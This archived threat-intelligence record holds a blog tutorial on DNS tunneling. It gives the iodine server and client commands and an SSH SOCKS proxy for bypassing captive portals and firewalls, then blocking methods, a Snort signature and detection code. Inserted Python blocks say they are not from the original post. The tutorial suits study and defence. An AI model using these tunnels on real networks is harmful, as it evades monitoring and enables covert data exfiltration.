{
	"id": "6461230b-4449-48d8-80cf-ce77af8fd698",
	"created_at": "2026-04-29T08:21:23.022172Z",
	"updated_at": "2026-04-29T10:41:48.969854Z",
	"deleted_at": null,
	"sha1_hash": "45da1e76cf14f74596bf5f28dbeefd94ffc87d03",
	"title": "Learn how easy is to bypass firewalls using DNS tunneling (and also how to block it)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3761540,
	"plain_text": "Learn how easy it is to bypass firewalls using DNS tunneling (and also how to block it)\r\nBy Roger Galobardes\r\nPublished: 2023-01-01 · Archived: 2026-04-29 07:20:49 UTC\r\n9 min read\r\nOct 30, 2018\r\nSee how I played red team/blue team in this simple network security experiment.\r\nPhoto by Rob Bye on Unsplash\r\nMany tutorials out there explain how to perform DNS tunneling, but most of them feel like just a compilation of the commands needed to execute it, with almost no explanation of the networking background.\r\nWhat’s even worse: no one seems to discuss how to prevent DNS tunneling from happening in your network.\r\n1. What is it and why would someone use it:\r\nDNS tunneling is a method of sending arbitrary data over the DNS protocol, a protocol that was never intended for data transfer. Because of that, people tend to overlook it, and it has become a popular and effective tool in many attacks.\r\nThe most popular use case for DNS tunneling is obtaining free internet by bypassing captive portals at airports, hotels or, if you are patient, the not-so-cheap in-flight Wi-Fi.\r\nHotels generally provide an access code if you ask… but we all have introvert days.\r\nOn those shared internet hotspots HTTP traffic is blocked until a username/password is provided; however, DNS traffic is generally still allowed in the background, because the portal needs name resolution to work in order to redirect you to its login page. As long as the hotspot’s resolver forwards queries to the internet, we can encode our traffic inside DNS queries and voilà, we have internet access.\r\nThis sounds fun, but the reality is that browsing anything over a DNS tunnel is slow.
Like, back to 1998 slow.\r\nAnother, more dangerous use of DNS tunneling is bypassing network security devices (firewalls, DLP appliances…) to set up a direct and unmonitored communications channel out of an organisation’s network.\r\nThe possibilities here are endless: data exfiltration, a covert channel for another penetration testing tool… you name it.\r\nTo make it even more worrying, there is a large number of easy-to-use DNS tunneling tools out there.\r\nThere is even at least one VPN-over-DNS provider (warning: the design of the website is hideous, making me doubt its legitimacy).\r\nAs a pentester all this is great; as a network admin, not so much.\r\n2. How does it work:\r\nFor those who know nothing about DNS but still made it here, I think you deserve a very brief explanation of what DNS does: DNS is like a phonebook for the internet. It translates domain names (human-friendly, the person’s name) into IP addresses (machine-friendly, the phone number). That helps us remember many websites, the same way we remember many people’s names.\r\nFor those who know what DNS is, I would suggest looking here for a quick refresher, but in short what you need to know is:\r\nA record: maps a domain name to an IPv4 address.\r\nexample.com → 12.34.52.67\r\nNS record (a.k.a. nameserver record): delegates a domain name, and everything under it, to the nameservers that are authoritative for it. Any resolver that wants to look up a name under that domain has to go and ask one of those servers. This delegation is what makes DNS tunneling possible: if we own the zone, we decide which server receives every query for it.\r\nexample.com → server1.example.com, server2.example.com\r\nWho is involved in DNS tunneling?\r\nClient. Launches DNS requests with data in them for a domain.\r\nOne domain that we can configure, with an NS record so that the world’s DNS servers redirect its requests to a server of our own.\r\nServer.
This is the nameserver the NS record points to: the machine that ultimately receives every DNS request for our domain and runs the tunnel server.\r\nThe 6 steps in DNS tunneling (simplified):\r\nI should have been an artist but I just loved subnetting too much.\r\n1. The client encodes data in a DNS request. It does this by prepending a piece of data to the domain in the query name. For example: mypieceofdata.server1.example.com\r\n2. The DNS request goes out to the local DNS resolver (the hotel’s, the airline’s or your company’s), which the firewall lets through because it is just DNS.\r\n3. The resolver finds the NS record for our domain, then the A record of the nameserver it points to, which is the IP address of our server.\r\n4. The query for mypieceofdata.server1.example.com is forwarded to our server.\r\n5. The server decodes mypieceofdata and processes whatever it was supposed to do. Let’s assume it was an HTTP request.\r\n6. The server encodes the answer in the DNS response, which travels back the same way, and woop woop, we’ve got signal.\r\nEvery request carries only a few hundred bytes (a DNS name is capped at 253 characters) and every one of them is a full round trip through the resolver to your server, so as you can imagine the key to a usable connection is low latency. When most airlines provide internet connections with around 1 second of ping, you might spend the whole 17 hours 40 minutes between Auckland and Doha loading this article.\r\n3. Step by step example using iodine:\r\nFor this example we will use the famous tool iodine. From their website, the name came from this:\r\nThe name iodine was chosen since it starts with IOD (IP Over DNS) and since iodine has atomic number 53, which happens to be the DNS port number.\r\n1. Checklist before you start — what you need:\r\nA domain that you can configure. GoDaddy allows this for their cheap .xyz domains.\r\nA device that acts as a server, which has a public IP address and, if it sits behind a firewall, is reachable on UDP port 53. For this example I am using an old Raspberry Pi, but you can run iodine on a plethora of devices.
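A quick aside before the rest of the checklist, to make steps 1 and 5 above concrete and to show what the domain you are about to configure costs you. The Python below is an added example, not code from the original post or from iodine, and the domain names in it are made up: it packs bytes into labels under a tunnel domain, decodes them on the server side, and computes how many raw bytes a single query can carry for a given domain.

```python
# Added example, not the original post's or iodine's code: step 1 and step 5
# of the tunnel in miniature. The client packs bytes into the query name
# under a domain it controls; the server the domain is delegated to decodes
# the name back into bytes. The DNS format caps a name at 253 characters and
# a label at 63, which is why every request carries so little and why a
# short subdomain (the protip further down) buys a little more room.
import base64

MAX_LABEL = 63   # longest label allowed in a DNS name
MAX_NAME = 253   # longest name in presentation form, dots included

def max_payload_chars(room: int) -> int:
    # how many base32 characters fit in room characters once every
    # 63-character label has to be separated from the next by a dot
    chars = room
    while chars + (chars + MAX_LABEL - 1) // MAX_LABEL - 1 > room:
        chars -= 1
    return chars

def capacity(topdomain: str) -> int:
    # raw bytes carried by one query name for this topdomain, using base32:
    # 5 bits per character, chosen because DNS names are case-insensitive
    # (iodine probes whether the path preserves case and only then switches
    # to denser base64/base128 encodings)
    room = MAX_NAME - len(topdomain) - 1          # minus the dot before it
    return max_payload_chars(room) * 5 // 8

def encode_query(payload: bytes, topdomain: str) -> str:
    # client side: base32 without padding, cut into labels, our domain last
    chars = base64.b32encode(payload).decode('ascii').rstrip('=').lower()
    labels = [chars[i:i + MAX_LABEL] for i in range(0, len(chars), MAX_LABEL)]
    name = '.'.join(labels + [topdomain])
    if len(name) > MAX_NAME:
        raise ValueError('payload does not fit in one query name')
    return name

def decode_query(name: str, topdomain: str) -> bytes:
    # server side: strip our domain, drop the label dots, restore padding
    suffix = '.' + topdomain
    if not name.lower().endswith(suffix.lower()):
        raise ValueError('query is not for our tunnel domain')
    chars = name[:-len(suffix)].replace('.', '').upper()
    return base64.b32decode(chars + '=' * (-len(chars) % 8))

def chunk_payload(payload: bytes, topdomain: str) -> list:
    # split a message into the queries needed to move it upstream; each of
    # them is one DNS round trip, which is where the slowness comes from
    n = capacity(topdomain)
    return [encode_query(payload[i:i + n], topdomain)
            for i in range(0, len(payload), n)]

if __name__ == '__main__':
    for dom in ('t.exampledomain.xyz', 'tunnel.exampledomain.xyz'):
        print(dom, 'carries', capacity(dom), 'bytes per query')
    msg = b'GET / HTTP/1.1' + bytes([13, 10]) + b'Host: example.com' + bytes([13, 10, 13, 10])
    queries = chunk_payload(msg, 't.exampledomain.xyz')
    print(len(queries), 'query needed, first one:', queries[0])
    assert b''.join(decode_query(q, 't.exampledomain.xyz') for q in queries) == msg
```

The two capacities come out at 143 and 140 bytes per query: the 253-character cap on a name is the real budget, the domain you pick is what you subtract from it, and every query is a full round trip to your server, which is where the 1998 feeling comes from. iodine does the same job with more care, probing the path and moving to denser encodings and bigger downstream record types when the resolvers in between tolerate them.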
(If you’re reading an article as specific as this one, I assume you already know how to run Linux on a Raspberry Pi and how to install iodine!)\r\nA client with iodine installed. For this I will use my Kali VM, but again, you can even run iodine on Windows if you want.\r\nIt can do more than emulating Street Fighter 2 Turbo apparently.\r\n2. Register a domain on GoDaddy and configure it like this:\r\nA record called dnsa.exampledomain.xyz → your public IP address\r\nNS record called t.exampledomain.xyz → dnsa.exampledomain.xyz\r\n→ Protip: having a short subdomain name like “t” leaves more room in every query name, which is limited to 253 characters, so you can pack more data into every single request.\r\nYou can do this with a dynamic IP, but you will need to use a dynamic DNS provider and point the NS record at the dynamic DNS hostname instead.\r\n3. Wait for it to propagate.\r\nThis can take from 1 to 24 hours.\r\n4. Run iodine on your server:\r\n$ sudo iodined -c -f 10.0.0.1 -P password t.exampledomain.xyz\r\n-f keeps iodined in the foreground, -c disables the check that all of a client’s requests arrive from the same source IP (needed when the resolver in front of the client load-balances across several addresses), 10.0.0.1 is the server end of the tunnel network, -P is the password the client has to present, and t.exampledomain.xyz is the domain the NS record delegates to this server.\r\n…If you copy and paste that password you deserve whatever happens because of it.\r\n5. Verify that it works:\r\nAt this point you can verify your DNS setup with the following tool from the iodine team:\r\nhttps://code.kryo.se/iodine/check-it/\r\nIodine must be running on the server and be reachable from the internet!\r\nIf you’re on the right path you should see this message.\r\nIt is also a good moment to check what your client’s public IP address is and note it down; that will help to verify later that the DNS tunnel works.\r\nIt is important to use tools that make you look professional.\r\n6. 
Run iodine on the client and establish the DNS tunnel:\r\nOn the client:\r\nroot@kali:~# iodine -I 50 -f -P password t.exampledomain.xyz.\r\n-f again keeps it in the foreground, -P is the same password as on the server, and -I 50 raises the maximum interval in seconds between requests from the default of 4: iodine keeps polling the server for downstream data even when you are idle, so a higher value means fewer queries and a less obvious traffic pattern, at the price of latency. With no nameserver argument iodine uses the system resolver, which on a captive portal is exactly the resolver we want to abuse.\r\niodine tries many encoding methods to see which one is most suitable.\r\nA new network interface should appear in your client, and you should be able to ping the server’s tunnel IP address we configured before.\r\ndns0 will now appear under your client’s network interfaces\r\nYou should be able to ping the server, even SSH into it, all through your fresh DNS tunnel.\r\nNow, at this point you could set up a route for your traffic to be sent to 10.0.0.1 and you’d be good to go.\r\nHowever, the DNS tunnel itself is not encrypted (the password only authenticates the client; every byte of data is readable by anyone who can see the DNS queries), so an extra step we can take is…\r\n7. Establish an SSH tunnel over the DNS tunnel:\r\nOn the client establish an SSH tunnel to the server’s tunnel address:\r\nssh -D 8080 -N 10.0.0.1\r\n-N tells ssh not to execute a remote command (we only want the forwarding), and -D 8080 opens a local SOCKS proxy on port 8080: whenever an application connects to it, ssh forwards that connection over the SSH session, which itself rides inside the DNS tunnel.\r\n8. Change the proxy settings accordingly in your browser (SOCKS host 127.0.0.1, port 8080):\r\n9. 
Enjoy your slow, yet free, internet access.\r\nA good way to test it is to check that the public IP address seen from the client is now the same as the server’s…\r\nCongratulations!\r\n4. Blocking DNS tunneling on your network (with an example!):\r\nNow this is the bit where I’ve struggled to find more information.\r\nThere are many approaches you can follow to block DNS tunneling; which one to choose will depend on your current deployment:\r\n1. Detection of known malicious domains:\r\nThis is done by analyzing the DNS queries from your network and, if one of them is for a known bad domain, dropping it.\r\nThe easiest way to implement this is by using a public DNS resolver that provides a layer of security. Free examples of this are Cloudflare (just check you’re not using 1.1.1.1 in your network…), or OpenDNS (free for home use). Enterprise solutions include some of the Infoblox products or Cisco Umbrella, to name the most common ones.\r\nAlternatively some firewalls provide URL filtering and might be able to block known domains.\r\nWith this method you are relying on a blacklist of known malicious domains, so if you are the victim of a targeted or small-scale attack using a freshly registered domain like the one above, chances are this is going to be useless. For the same reason, force all DNS traffic through your own resolver: a client that is allowed to send UDP/53 straight to the internet can talk to the tunnel server directly and the filtering resolver never sees the queries.\r\n2. Traffic analysis:\r\nMore of a reactive measure; however, if you have an idea of the average DNS request rate in your network or per host, you should be able to detect a sudden increase in DNS activity. A DNS tunnel also stands out qualitatively: thousands of unique, long, random-looking subdomains of a single domain, often with unusual record types (NULL, TXT) and large responses.\r\nAgain, there are many tools you can use for this: firewalls that have application visibility (most NGFWs should do this), network flow analysis tools, or dedicated DNS security appliances like the ones from Infoblox.\r\n3. 
Intrusion prevention systems:\r\nSome IPS systems such as Snort ship rules that detect packets unique to iodine. This Snort rule matches the server’s reply to the iodine version handshake:\r\n# alert udp $EXTERNAL_NET 53 -\u003e $HOME_NET any (msg:\"APP-DETECT iodine dns tunnelling handshake server ACK\"; flow:to_client; byte_test:1,\u0026,0x80,2; content:\"|00 01 00 01 00|\"; depth:5; offset:4; content:\"v\"; within:1; distance:4; content:\"VACK\"; within:200; fast_pattern; metadata:service dns; reference:url,code.kryo.se/iodine/README.html; classtype:policy-violation; sid:27046; rev:2;)\r\nReading it from left to right: the packet comes from port 53 towards our network and is a response (the QR bit, 0x80 in byte 2, is set), it carries exactly one question and one answer (bytes 4 to 8 are 00 01 00 01 00), the first label of the query name starts with the letter v (iodine’s version handshake query), and the string VACK (iodine’s version acknowledgement) appears within the next 200 bytes. Note the leading #: as shipped the rule is commented out, so it has to be enabled before it fires.\r\nSome other, more generic rules detect long query names in DNS requests; those rules can easily be bypassed by shortening the payload in every request (although that slows down the tunnel).\r\nBlocking a DNS tunnel — an example:\r\nDuring my iodine deployment I was sending all traffic through a Palo Alto Networks firewall in my environment. The plan was to play the attacker role first and the defender later.\r\nFirst I configured a basic URL filtering rule to block social network websites:\r\nI blocked social networking sites on the URL filtering engine and soon I was browsing them again.\r\nIn seconds I established my DNS tunnel… and it worked! Soon I was loading Facebook.\r\nI was surprised at how easy it was to bypass the URL filtering engine, and then I proceeded to switch teams and see how I could block this.\r\nThe starting point would be traffic analysis: I expected a big amount of DNS traffic and then some convoluted solution to block sudden changes in traffic patterns.\r\nHowever, this is what I found, to my surprise:\r\nBasic application usage analysis on a Palo Alto Networks firewall\r\nThe firewall was detecting that I was sending TCP traffic over DNS.
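Before looking at what the firewall keyed on, here is what the same detection looks like in code. The Python below is an added example, not code from the original post, from Snort or from any firewall vendor: it reimplements the checks of the Snort rule quoted in the IPS point above against a DNS response built to look like iodine’s version handshake, and runs the traffic analysis heuristics (query volume, label length, label randomness, number of distinct names) over a constructed query log. The client addresses, names and thresholds are made up for the example.

```python
# Added example, not code from the original post, from Snort or from any
# firewall vendor: two ways to spot the tunnel, run over constructed data.
#   1. a signature: the same checks as Snort sid 27046, applied to a DNS
#      response built here with the layout iodine uses for its handshake
#   2. the generic heuristics from the traffic analysis point: query volume,
#      length and randomness of the leftmost label, number of distinct names,
#      over constructed resolver-log entries
import base64
import collections
import hashlib
import math
import struct

def dns_name(name: str) -> bytes:
    # wire format: each label prefixed by its length, zero byte at the end
    out = b''
    for label in name.strip('.').split('.'):
        out += bytes([len(label)]) + label.encode('ascii')
    return out + bytes([0])

def build_response(qname: str, rdata: bytes, qr: bool = True) -> bytes:
    # one question plus one NULL-type (10) answer; iodine uses NULL by default
    flags = 0x8180 if qr else 0x0100            # qr=False gives a query header
    header = struct.pack('>HHHHHH', 0x1234, flags, 1, 1, 0, 0)
    question = dns_name(qname) + struct.pack('>HH', 10, 1)
    answer = bytes([0xC0, 0x0C]) + struct.pack('>HHIH', 10, 1, 0, len(rdata)) + rdata
    return header + question + answer

def looks_like_iodine_ack(pkt: bytes) -> bool:
    # Snort sid 27046, check by check:
    #   byte_test 0x80 on byte 2       -> QR bit set: this is a response
    #   |00 01 00 01 00| at offset 4   -> QDCOUNT 1, ANCOUNT 1, NSCOUNT high 0
    #   v, distance 4, within 1        -> byte 13, first char of the first
    #                                     label, is v (iodine version query)
    #   VACK within 200                -> the version ACK in the answer
    if len(pkt) < 14 or (pkt[2] & 0x80) == 0:
        return False
    if pkt[4:9] != bytes([0, 1, 0, 1, 0]):
        return False
    if pkt[13] != ord('v'):
        return False
    return b'VACK' in pkt[14:214]

def label_for(i: int) -> str:
    # deterministic stand-in for tunnel payload: base32 of a hash
    digest = hashlib.sha256(str(i).encode('ascii')).digest()
    return base64.b32encode(digest).decode('ascii').lower().rstrip('=')

# constructed query log as (client, qname); a real one would come from the
# resolver, a passive DNS sensor or the NGFW
QUERY_LOG = (
    [('10.0.0.5', n) for n in ('www.example.com', 'mail.example.com',
                               'cdn.example.net', 'www.example.com')]
    # tunnel client using long labels
    + [('10.0.0.23', label_for(i)[:50] + '.t.exampledomain.xyz') for i in range(200)]
    # tunnel client that shortened its payload to dodge length rules
    + [('10.0.0.42', label_for(i)[:8] + '.t.exampledomain.xyz') for i in range(200)]
)

def entropy(s: str) -> float:
    # Shannon entropy in bits per character
    counts = collections.Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def score_clients(log, max_queries=50, max_label_len=30, min_entropy=3.5):
    # returns {client: [reasons]}; an empty list means nothing suspicious
    stats = {}
    for client, name in log:
        st = stats.setdefault(client, {'n': 0, 'len': 0, 'ent': 0.0, 'names': set()})
        first = name.split('.')[0]
        st['n'] += 1
        st['len'] += len(first)
        st['ent'] += entropy(first)
        st['names'].add(name)
    verdicts = {}
    for client, st in stats.items():
        n = st['n']
        reasons = []
        if n > max_queries:
            reasons.append('volume')
        if st['len'] / n > max_label_len:
            reasons.append('long-labels')
        if st['ent'] / n > min_entropy:
            reasons.append('random-labels')
        if len(st['names']) > max_queries:
            reasons.append('unique-names')
        verdicts[client] = reasons
    return verdicts

if __name__ == '__main__':
    ack = build_response('vajkz.t.exampledomain.xyz', b'VACK' + bytes(8))
    print('iodine ack matched:', looks_like_iodine_ack(ack))
    for client, reasons in score_clients(QUERY_LOG).items():
        print(client, reasons or 'clean')
```

The second tunnel client in the log (10.0.0.42) shows the caveat from the IPS point: once the payload per query is shortened the length and entropy rules go quiet, but the volume and unique-name counters still fire, which is why the statistical approach is worth keeping next to the signatures.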
But how?\r\nClicking on the application details I could see the following:\r\nIt looks like the application detection engine identifies traffic from most DNS tunneling tools, in a similar way to the Snort rules we saw for iodine, and groups them all under the same application.\r\nGrouping all these tools into one application makes them easier to manage than a pile of individual Snort alerts.\r\nLet’s now create a rule that will block this type of application:\r\nFirst I create an Application Filter for evasive apps with a high risk rating. Notice tcp-over-dns is in the list.\r\nSecond, I define that this will apply to traffic sourced from inside my network.\r\nAnd finally, we make the rule deny all this traffic. Check this article to see what the difference is between a deny and a drop.\r\nEasy! Let’s see if it works:\r\nFirst we run iodine…\r\n…and apparently iodine can’t establish a tunnel anymore!\r\nJob’s done! Our network should now be secured against most DNS tunneling attacks, at least against the tools the application engine knows how to fingerprint.\r\nTo simulate a true real-world scenario I should switch sides again and try to bypass this firewall, but being honest, that would be way more complex.\r\nAnything you didn’t like?
Please tell me why!\r\nSource: https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/@galolbardes/learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000"
	],
	"report_names": [
		"learn-how-easy-is-to-bypass-firewalls-using-dns-tunneling-and-also-how-to-block-it-3ed652f4a000"
	],
	"threat_actors": [
		{
			"id": "08c8f238-1df5-4e75-b4d8-276ebead502d",
			"created_at": "2023-01-06T13:46:39.344081Z",
			"updated_at": "2026-04-29T10:39:53.338149Z",
			"deleted_at": null,
			"main_name": "Copy-Paste",
			"aliases": [],
			"source_name": "MISPGALAXY:Copy-Paste",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1777450883,
	"ts_updated_at": 1777459308,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/45da1e76cf14f74596bf5f28dbeefd94ffc87d03.pdf",
		"text": "https://archive.orkl.eu/45da1e76cf14f74596bf5f28dbeefd94ffc87d03.txt",
		"img": "https://archive.orkl.eu/45da1e76cf14f74596bf5f28dbeefd94ffc87d03.jpg"
	}
}